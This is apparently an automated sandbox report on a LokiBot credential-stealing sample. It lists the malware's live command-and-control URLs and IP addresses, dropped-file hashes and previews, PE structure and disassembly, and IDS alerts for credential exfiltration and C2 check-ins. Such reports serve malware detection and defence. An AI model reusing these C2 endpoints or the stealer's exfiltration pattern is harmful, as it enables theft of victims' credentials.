                External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection112DCSyncVirtualization/Sandbox Evasion11Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Owner/User Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowRemote System Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                aZOmps0Ug8.exe43%VirustotalBrowse
                aZOmps0Ug8.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                SourceDetectionScannerLabelLinkDownload
                0.0.aZOmps0Ug8.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
                1.2.aZOmps0Ug8.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                1.1.aZOmps0Ug8.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                1.0.aZOmps0Ug8.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
                0.2.aZOmps0Ug8.exe.f030000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                0.2.aZOmps0Ug8.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File

                Domains

                SourceDetectionScannerLabelLink
                74f26d34ffff049368a6cff8812f86ee.gq13%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                http://74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.php16%VirustotalBrowse
                http://74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.php100%Avira URL Cloudmalware
                http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
                http://alphastand.win/alien/fre.php0%URL Reputationsafe
                http://alphastand.trade/alien/fre.php0%URL Reputationsafe
                http://alphastand.top/alien/fre.php0%URL Reputationsafe
                http://www.ibsensoftware.com/0%URL Reputationsafe
                http://74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.phpA0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                74f26d34ffff049368a6cff8812f86ee.gq
                		172.67.219.104
                		truetrueunknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.phptrue
                • 16%, Virustotal, Browse
                • Avira URL Cloud: malware
                		unknown
                http://kbfvzoboss.bid/alien/fre.phptrue
                • URL Reputation: safe
                		unknown
                http://alphastand.win/alien/fre.phptrue
                • URL Reputation: safe
                		unknown
                http://alphastand.trade/alien/fre.phptrue
                • URL Reputation: safe
                		unknown
                http://alphastand.top/alien/fre.phptrue
                • URL Reputation: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://nsis.sf.net/NSIS_ErroraZOmps0Ug8.exefalse
                  		high
                  http://nsis.sf.net/NSIS_ErrorErroraZOmps0Ug8.exefalse
                    		high
                    http://www.ibsensoftware.com/aZOmps0Ug8.exe, aZOmps0Ug8.exe, 00000001.00000001.351943759.0000000000400000.00000040.00020000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.phpAaZOmps0Ug8.exe, 00000001.00000002.612017929.0000000000658000.00000004.00000020.sdmptrue
                    • Avira URL Cloud: safe
                    		unknown

                    Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public

                    IPDomainCountryFlagASNASN NameMalicious
                    172.67.219.104
                    		74f26d34ffff049368a6cff8812f86ee.gqUnited States
                    		13335CLOUDFLARENETUStrue
                    104.21.62.32
                    		unknownUnited States
                    		13335CLOUDFLARENETUStrue

                    Private

                    IP
                    192.168.2.1

                    General Information

                    Joe Sandbox Version:33.0.0 White Diamond
                    Analysis ID:502657
                    Start date:14.10.2021
                    Start time:08:27:12
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 7m 22s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Sample file name:aZOmps0Ug8 (renamed file extension from none to exe)
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                    Number of analysed new started processes analysed:22
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@3/4@81/3
                    EGA Information:Failed
                    HDC Information:
                    • Successful, ratio: 80.6% (good quality ratio 76.4%)
                    • Quality average: 80.6%
                    • Quality standard deviation: 28.6%
                    HCA Information:
                    • Successful, ratio: 82%
                    • Number of executed functions: 70
                    • Number of non-executed functions: 53
                    Cookbook Comments:
                    • Adjust boot time
                    • Enable AMSI
                    Warnings:
                    Show All
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                    • Excluded IPs from analysis (whitelisted): 23.203.141.148, 20.50.102.62, 2.20.178.56, 2.20.178.10, 20.54.110.249, 40.112.88.60, 2.20.178.24, 2.20.178.33, 95.100.216.89, 20.82.210.154
                    • Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    08:28:20API Interceptor78x Sleep call for process: aZOmps0Ug8.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    172.67.219.104Bank Details.xlsxGet hashmaliciousBrowse
                    • 74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.php
                    QGBN7om1fc.exeGet hashmaliciousBrowse
                    • 74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.php
                    11882.xlsxGet hashmaliciousBrowse
                    • 74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.php
                    Vgcx5Y4HKH.exeGet hashmaliciousBrowse
                    • 74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.php
                    JtdPd3UkrM.exeGet hashmaliciousBrowse
                    • 74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.php
                    Notification.xlsxGet hashmaliciousBrowse
                    • 74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.php
                    FOSaObIu24.exeGet hashmaliciousBrowse
                    • 74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.php
                    Payment Advice.xlsxGet hashmaliciousBrowse
                    • 74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.php
                    104.21.62.32Bank Details.xlsxGet hashmaliciousBrowse
                    • 74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.php
                    QGBN7om1fc.exeGet hashmaliciousBrowse
                    • 74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.php
                    11882.xlsxGet hashmaliciousBrowse
                    • 74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.php
                    Vgcx5Y4HKH.exeGet hashmaliciousBrowse
                    • 74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.php
                    JtdPd3UkrM.exeGet hashmaliciousBrowse
                    • 74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.php
                    Notification.xlsxGet hashmaliciousBrowse
                    • 74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.php
                    FOSaObIu24.exeGet hashmaliciousBrowse
                    • 74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.php
                    Payment Advice.xlsxGet hashmaliciousBrowse
                    • 74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.php

                    Domains

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    74f26d34ffff049368a6cff8812f86ee.gqBank Details.xlsxGet hashmaliciousBrowse
                    • 172.67.219.104
                    QGBN7om1fc.exeGet hashmaliciousBrowse
                    • 104.21.62.32
                    11882.xlsxGet hashmaliciousBrowse
                    • 104.21.62.32
                    Vgcx5Y4HKH.exeGet hashmaliciousBrowse
                    • 104.21.62.32
                    JtdPd3UkrM.exeGet hashmaliciousBrowse
                    • 172.67.219.104
                    Notification.xlsxGet hashmaliciousBrowse
                    • 104.21.62.32
                    FOSaObIu24.exeGet hashmaliciousBrowse
                    • 172.67.219.104
                    Payment Advice.xlsxGet hashmaliciousBrowse
                    • 104.21.62.32

                    ASN

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    CLOUDFLARENETUSk00FzM4fb3.exeGet hashmaliciousBrowse
                    • 104.21.26.237
                    hQQe6WqUOP.exeGet hashmaliciousBrowse
                    • 162.159.133.233
                    0JckmrUWzC.exeGet hashmaliciousBrowse
                    • 172.67.143.100
                    8Yhzfjf0tx.exeGet hashmaliciousBrowse
                    • 172.67.168.153
                    GR01DtRd0N.exeGet hashmaliciousBrowse
                    • 162.159.133.233
                    TqSDHvsKpt.exeGet hashmaliciousBrowse
                    • 162.159.129.233
                    Bank Details.xlsxGet hashmaliciousBrowse
                    • 104.21.62.32
                    fYkew3tmy4.exeGet hashmaliciousBrowse
                    • 172.67.188.154
                    Wellis Inquiry.exeGet hashmaliciousBrowse
                    • 104.21.2.218
                    Halkbank,pdf.exeGet hashmaliciousBrowse
                    • 172.67.188.154
                    Asperiores.exeGet hashmaliciousBrowse
                    • 172.67.177.45
                    jew.arm7Get hashmaliciousBrowse
                    • 104.30.5.105
                    Dbvisualizer-Licence_982671065.exeGet hashmaliciousBrowse
                    • 172.67.177.45
                    EaZ0UhBdLE.exeGet hashmaliciousBrowse
                    • 104.21.26.237
                    Purchase Order PO-1000837 from LAW TRANSPORT.htmlGet hashmaliciousBrowse
                    • 104.16.19.94
                    hoho.arm7Get hashmaliciousBrowse
                    • 104.27.20.79
                    hoho.x86Get hashmaliciousBrowse
                    • 172.70.21.0
                    #Ud83d#Udcde-youse.guia-644-46204-282109.htmGet hashmaliciousBrowse
                    • 104.16.18.94
                    tmDSSwkOAMGet hashmaliciousBrowse
                    • 172.68.102.160
                    oIKRh1ruPM.exeGet hashmaliciousBrowse
                    • 162.159.130.233

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    C:\Users\user\AppData\Local\Temp\nsj1540.tmp\mahyiit.dllBank Details.xlsxGet hashmaliciousBrowse

                      Created / dropped Files

                      C:\Users\user\AppData\Local\Temp\96w0bq54qhi02
                      Process:C:\Users\user\Desktop\aZOmps0Ug8.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):217921
                      Entropy (8bit):7.989316240408084
                      Encrypted:false
                      SSDEEP:6144:lURBaQUyhxMk5O9VK/zHl/hfjB9i4laUw+I:lYUyvMC/jXjrH3I
                      MD5:D6B090A9F226F60E8C2514C17AC0ACAE
                      SHA1:95852FEF4218FD1620E8AE8425A29332B1AA8403
                      SHA-256:DF082B249FD67FDAF005CC9ED5C047DE2914995F41AB72CD35B18CF661AB27CC
                      SHA-512:91DA3ED8442E03CEA52DEEC0C0266A19FBEC2EFD4475CCC05C5FD9A9212A8C715981F94BD17EB16EE0AD880785544E3A41AC56E195C6C03DEB3B433EEDE3FCC7
                      Malicious:false
                      Reputation:low
                      Preview: ..:.}w%.. .#.'..i5...O..m_..6.Hx.@/.w3+.b.....eWu.8.....?..m..M*..".<qP....>+1............N"{a._(*........iF|./`t..#u....6.X.!/..p,....U).t..2{:...-.d61.........:..}W.R..1Ea_N.;c~...b..E..K..m2X...E.>^...#..5....... .AQ~..|pl3...s!.........c...fwG.J..#...Y.......m_q.6....@/.w3..b....e.u.8........m.i..*.`..d..G+..O.Q>..d5.....n.s..]S.......GD..!.}...V..#u....6.....l\uwO.Lu!.k....*ko&,p.W......8Iw`.....C.... ...)+..c..z...........,m...vz.(6...J....<;..lbJf...|p.N..K.I.x.Bg....c...w%.. .#K......x.......m_..6..x.@..w3+.b.....eWu.8.{h......m)d..*Q...:...x..O..>..d5.....O...]S........GD....#...l..#u....6.....l.uwO.Lu!.k....*ko&,p.W......8Iw`.....C.... ...)+..c..z............,m...vz.(6...J....<;..l.AQ~..|p.:..KOI.x.g....c...w%.. .#....i5...&..m_..6.Hx.@/.w3+.b.....eWu.8........m.u.*{`..d...+..O..>..d5.....O.s..]S........GD....#...V..#u....6.....l\uwO.Lu!.k....*ko&,p.W......8Iw`.....C.... ...)+..c..z............,m...vz.(6...J....<;..l
                      C:\Users\user\AppData\Local\Temp\nsj1540.tmp\mahyiit.dll
                      Process:C:\Users\user\Desktop\aZOmps0Ug8.exe
                      File Type:PE32 executable (DLL) (native) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):107520
                      Entropy (8bit):6.386049451747606
                      Encrypted:false
                      SSDEEP:1536:wmFgGAZxpEuLPsu0NR7mNzUK2q8fIrzcYyKkRrIAHaqsWnvf3WklE9ncobUfsirl:FFgGAaus+eyvKjxlErGrz
                      MD5:B5D0F9FBB3DF9A1A42B479FDD334417C
                      SHA1:F0780DBAFBDB20235C97A28CC0AD8E1ABC1547F3
                      SHA-256:0EAEC60342B2074DA968F010E592AD52C8B7DBFD72759B97F999F0EB88861136
                      SHA-512:3BD39726FEB5B0B946E6B29C17A12BA044BF2D0E5374C217527542A6A6F09F65E3944007D0427936178E5C485BEDE8631CAA5738D0BE50AC291759FCDD4EC26F
                      Malicious:false
                      Joe Sandbox View:
                      • Filename: Bank Details.xlsx, Detection: malicious, Browse
                      Reputation:low
                      Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....mga...........!....."...~.......*..............................................................................<...M...........................................................................h]..H............................................text.... .......".................. ..`.rdata...V...@...X...&..............@..@.data....B.......$...~..............@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck
                      Process:C:\Users\user\Desktop\aZOmps0Ug8.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Reputation:high, very likely benign file
                      Preview: 1
                      C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\21c8026919fd094ab07ec3c180a9f210_d06ed635-68f6-4e9a-955c-4899f5f57b9a
                      Process:C:\Users\user\Desktop\aZOmps0Ug8.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):49
                      Entropy (8bit):1.2701062923235522
                      Encrypted:false
                      SSDEEP:3:/l1PL3n:fPL3
                      MD5:CD8FA61AD2906643348EEF98A988B873
                      SHA1:0B10E2F323B5C73F3A6EA348633B62AE522DDF39
                      SHA-256:49A11A24821F2504B8C91BA9D8A6BD6F421ED2F0212C1C771BF1CAC9DE32AD75
                      SHA-512:1E6F44AB3231232221CF0F4268E96A13C82E3F96249D7963B78805B693B52D3EBDABF873DB240813DF606D8C207BD2859338D67BA94F33ECBA43EA9A4FEFA086
                      Malicious:false
                      Reputation:moderate, very likely benign file
                      Preview: ........................................user.

                      Static File Info

                      General

                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                      Entropy (8bit):7.93701459995172
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.96%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:aZOmps0Ug8.exe
                      File size:283552
                      MD5:70d177abc7455c709ae9710630b9ea49
                      SHA1:4d81e55880a35c0157046560eca20b9f528838f4
                      SHA256:b87ecdb8035fa8b5ce87570d757265182a9f49122a02e77dc7f414816cf4b511
                      SHA512:25fd5fa3de0e8bfb89695b3ce55dbeb059eaaaef4a8d9cd4e503f1ccda379cc0ba550354aee59445876c1ea1244d3d696ecfd7e964f3ce0f328a83f48c5ce24c
                      SSDEEP:6144:wBlL/cVBMRm3NqjXSfxgGNoYnUC9jIVUp6Uxgo9+n1J8UA:CeVj9+XI/NoYxpWV4go9afA
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0(..QF..QF..QF.*^...QF..QG.qQF.*^...QF..rv..QF..W@..QF.Rich.QF.........PE..L...e:.V.................\...........0.......p....@

                      File Icon

                      Icon Hash:b2a88c96b2ca6a72

                      Static PE Info

                      General

                      Entrypoint:0x4030fb
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                      DLL Characteristics:TERMINAL_SERVER_AWARE
                      Time Stamp:0x56FF3A65 [Sat Apr 2 03:20:05 2016 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:4
                      OS Version Minor:0
                      File Version Major:4
                      File Version Minor:0
                      Subsystem Version Major:4
                      Subsystem Version Minor:0
                      Import Hash:b76363e9cb88bf9390860da8e50999d2

                      Entrypoint Preview

                      Instruction
                      sub esp, 00000184h
                      push ebx
                      push ebp
                      push esi
                      push edi
                      xor ebx, ebx
                      push 00008001h
                      mov dword ptr [esp+20h], ebx
                      mov dword ptr [esp+14h], 00409168h
                      mov dword ptr [esp+1Ch], ebx
                      mov byte ptr [esp+18h], 00000020h
                      call dword ptr [004070B0h]
                      call dword ptr [004070ACh]
                      cmp ax, 00000006h
                      je 00007FC0C4CD96E3h
                      push ebx
                      call 00007FC0C4CDC4C4h
                      cmp eax, ebx
                      je 00007FC0C4CD96D9h
                      push 00000C00h
                      call eax
                      mov esi, 00407280h
                      push esi
                      call 00007FC0C4CDC440h
                      push esi
                      call dword ptr [00407108h]
                      lea esi, dword ptr [esi+eax+01h]
                      cmp byte ptr [esi], bl
                      jne 00007FC0C4CD96BDh
                      push 0000000Dh
                      call 00007FC0C4CDC498h
                      push 0000000Bh
                      call 00007FC0C4CDC491h
                      mov dword ptr [00423F44h], eax
                      call dword ptr [00407038h]
                      push ebx
                      call dword ptr [0040726Ch]
                      mov dword ptr [00423FF8h], eax
                      push ebx
                      lea eax, dword ptr [esp+38h]
                      push 00000160h
                      push eax
                      push ebx
                      push 0041F4F0h
                      call dword ptr [0040715Ch]
                      push 0040915Ch
                      push 00423740h
                      call 00007FC0C4CDC0C4h
                      call dword ptr [0040710Ch]
                      mov ebp, 0042A000h
                      push eax
                      push ebp
                      call 00007FC0C4CDC0B2h
                      push ebx
                      call dword ptr [00407144h]

                      Rich Headers

                      Programming Language:
                      • [EXP] VC++ 6.0 SP5 build 8804

                      Data Directories

                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0x74180xa0.rdata
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x2d0000x9e0.rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0x70000x27c.rdata
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                      Sections

                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      .text0x10000x5aeb0x5c00False0.665123980978data6.42230569414IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      .rdata0x70000x11960x1200False0.458984375data5.20291736659IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .data0x90000x1b0380x600False0.432291666667data4.0475118296IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                      .ndata0x250000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .rsrc0x2d0000x9e00xa00False0.45625data4.50948350161IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                      Resources

                      NameRVASizeTypeLanguageCountry
                      RT_ICON0x2d1900x2e8dataEnglishUnited States
                      RT_DIALOG0x2d4780x100dataEnglishUnited States
                      RT_DIALOG0x2d5780x11cdataEnglishUnited States
                      RT_DIALOG0x2d6980x60dataEnglishUnited States
                      RT_GROUP_ICON0x2d6f80x14dataEnglishUnited States
                      RT_MANIFEST0x2d7100x2ccXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                      Imports

                      DLLImport
                      KERNEL32.dllGetTickCount, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, SetFileAttributesA, CompareFileTime, SearchPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, GetTempPathA, Sleep, lstrcmpiA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrcatA, GetSystemDirectoryA, WaitForSingleObject, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, lstrlenA, GetCommandLineA, GetProcAddress, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, WriteFile, MulDiv, MultiByteToWideChar, LoadLibraryExA, GetModuleHandleA, FreeLibrary
                      USER32.dllSetCursor, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, EndDialog, ScreenToClient, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetForegroundWindow, GetWindowLongA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, SetTimer, PostQuitMessage, SetWindowLongA, SendMessageTimeoutA, LoadImageA, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, CreateDialogParamA, DestroyWindow, ShowWindow, SetWindowTextA
                      GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                      SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA, ShellExecuteA
                      ADVAPI32.dllRegDeleteValueA, SetFileSecurityA, RegOpenKeyExA, RegDeleteKeyA, RegEnumValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                      COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                      ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                      Possible Origin

                      Language of compilation systemCountry where language is spokenMap
                      EnglishUnited States

                      Network Behavior

                      Snort IDS Alerts

                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                      10/14/21-08:28:19.047157TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14977980192.168.2.6172.67.219.104
                      10/14/21-08:28:19.047157TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977980192.168.2.6172.67.219.104
                      10/14/21-08:28:19.047157TCP2025381ET TROJAN LokiBot Checkin4977980192.168.2.6172.67.219.104
                      10/14/21-08:28:19.047157TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24977980192.168.2.6172.67.219.104
                      10/14/21-08:28:20.347127TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14978080192.168.2.6172.67.219.104
                      10/14/21-08:28:20.347127TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978080192.168.2.6172.67.219.104
                      10/14/21-08:28:20.347127TCP2025381ET TROJAN LokiBot Checkin4978080192.168.2.6172.67.219.104
                      10/14/21-08:28:20.347127TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24978080192.168.2.6172.67.219.104
                      10/14/21-08:28:21.339482TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978180192.168.2.6104.21.62.32
                      10/14/21-08:28:21.339482TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978180192.168.2.6104.21.62.32
                      10/14/21-08:28:21.339482TCP2025381ET TROJAN LokiBot Checkin4978180192.168.2.6104.21.62.32
                      10/14/21-08:28:21.339482TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978180192.168.2.6104.21.62.32
                      10/14/21-08:28:22.592928TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978280192.168.2.6104.21.62.32
                      10/14/21-08:28:22.592928TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978280192.168.2.6104.21.62.32
                      10/14/21-08:28:22.592928TCP2025381ET TROJAN LokiBot Checkin4978280192.168.2.6104.21.62.32
                      10/14/21-08:28:22.592928TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978280192.168.2.6104.21.62.32
                      10/14/21-08:28:23.792482TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978380192.168.2.6172.67.219.104
                      10/14/21-08:28:23.792482TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978380192.168.2.6172.67.219.104
                      10/14/21-08:28:23.792482TCP2025381ET TROJAN LokiBot Checkin4978380192.168.2.6172.67.219.104
                      10/14/21-08:28:23.792482TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978380192.168.2.6172.67.219.104
                      10/14/21-08:28:24.885116TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978480192.168.2.6172.67.219.104
